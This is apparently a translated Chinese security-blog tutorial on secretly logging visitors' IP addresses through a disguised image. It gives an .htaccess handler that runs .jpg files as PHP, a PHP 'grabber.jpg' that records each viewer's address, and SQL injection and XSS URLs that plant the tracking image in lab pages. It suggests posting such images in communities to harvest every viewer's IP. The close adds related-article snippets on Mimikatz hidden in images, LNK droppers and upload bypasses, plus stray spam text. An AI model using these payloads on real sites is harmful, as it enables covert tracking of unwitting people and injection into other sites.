<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    如何通過一張照片來獲取ip地址?

    VSole2022-12-20 14:09:22

    在本教程中,我們將學習如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件,將jpg文件當作php文件來解析。

    下面就是我們需要向.htaccess中添加的代碼:

    AddHandler application/x-httpd-php5 .jpg
    

    然后將下面的代碼復制到記事本中,命名為grabber.jpg

    fh = fopen('ip_list.txt', 'a');
    fwrite($fh, $_SERVER['REMOTE_ADDR']."
    ");
    fclose($fh);
    $im = imagecreatefromjpeg("n00b.png");
    header('Content-Type: image/jpeg');
    imagejpeg($im);
    imagedestroy($im);
    ?>
    

    將grabber.jpg的權限設置為755,然后再找一張照片,將其命名為n00b.png,接著放到與grabber.jpg相同的目錄之中。

    就這樣,一切工作就緒了。當別人瀏覽grabber.jpg這張照片的時候,他的ip地址就會被記錄下來。

    (譯者注:需要把這些東西上傳至我們的個人網站空間中)

    POC:

    (譯者注:作者這里貼了一張可獲取ip的演示照片,為了大家的隱私,我沒有將其貼出,讀者可自行去作者博客查看)

    至此,我們的照片已經可以開始工作了。

    接著我還想說明一下如何使用SQLi來獲取ip地址。其實使用照片來盜取ip地址十分快捷,我們沒有理由去使用SQLi這種方法,但是為了讓讀者獲取到更多的知識,我還是說明一下吧:

    http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
    

    現在,再說一下如何使用xss來獲取ip地址:

    http://leettime.net/xsslab1/chalg1.php?name=<img src="http://leettime.net/idiots_test_lab/imageip/tryme.jpg">&submit=Search
    

    好了,就是這些了。

    我們可以用這個技巧做許多有趣的事情,事實上大部分社區都允許我們發布一些照片,所以我們可以用這個方法去獲取所有訪問到我們照片的人的ip地址。

    謝謝您的閱讀,Happy Hacking!

    jpg
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    來自Sucuri的研究人員在對受感染的Magento 2電子商務網站進行調查期間發現了該策略,該策略可以創造性地隱藏惡意活動,直到可以檢索到信息為止。Sucuri惡意軟件研究團隊的Luke Leal在上周在線發布的一份報告中,網站安全公司Sucuri的研究人員最近在使用開源電子商務平臺 Magento 2 對受感染網站進行調查期間發現了難以捉摸的策略。Leal解釋說,在受感染網站的內部窺視發現惡意注入正在捕獲來自站點訪問者的POST請求數據。
    過程Set-ExecutionPolicy Unrestricted -Scope CurrentUser //設置腳本策略Import-Module .\Invoke-PSimage.ps1 //導入腳本模塊Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\mimikatz.png -Image .\demo.jpg -Web. 開啟一個目標可以訪問的web服務,加載生成的mimikatz.png圖片。修改 example.com改成自己的web服務地址。然后進行遠程加載即可。
    USB 釣魚的幾種方式
    2020-10-12 16:29:52
    當目標點開美圖(惡意LNK快捷方式文件:confidential.jpg.lnk),使目標認為他正在打開圖像(confidential.jpg),HTA dropper 隱藏在快捷方式文件中。LNK將執行HTA,HTA將依次執行并刪除的DLL payload,并且用誘餌圖片替換快捷方式(confidential.jpg)。
    生成一張圖片馬上傳后訪問也是一樣查看一下源碼,核心代碼,發現文件是先上傳然后在處理,在刪除原文件生成新文件$extend = pathinfo;echo 'parent.alert("請嘗試重新上傳!這里的思路是利用程序去發包上傳,另一邊去訪問條件競爭從而繞過,這里用 burp 插件把圖片上傳包導出成 python requests 代碼,隨便寫了一下就沒有加多線程import requests. headers = {"Cache-Control": "max-age=0", "Sec-Ch-Ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"", "Sec-Ch-Ua-Mobile": "?
    在本教程中,我們將學習如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件,將jpg文件當作php文件來解析。下面就是我們需要向.htaccess中添加的代碼:AddHandler?然后將下面的代碼復制到記事本中,命名為grabber.jpgfh?我們可以用這個技巧做許多有趣的事情,事實上大部分社區都允許我們發布一些照片,所以我們可以用這個方法去獲取所有訪問到我們照片的人的ip地址。謝謝您的閱讀,Happy Hacking!
    TCP傳輸數據穩定可靠,UDP的優點是速度快。
    文件上傳前端JS 防護,通過抓包修改,或插件js禁用來繞過。后端黑名單上傳陌生后綴 .php3 php5上傳配置文件 .htaccess通過 雙寫 ,大小寫,基于windows 特性
    A:在網絡傳輸不穩定的情況下,導致文件傳輸不完整,可能會導致誤報,除了這個之外很少有人會在上傳過程中改變原有的文件類型. Q:能否繞過檢測?
    在同意和解一起指控Google在用戶激活 Chrome 瀏覽器隱身模式后仍非法跟蹤瀏覽活動的訴訟數周之后,Google悄然更新了該瀏覽器對其私密瀏覽功能的描述。最新的Canary版本(122.0.6251.0)中出現了更新后的文字。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类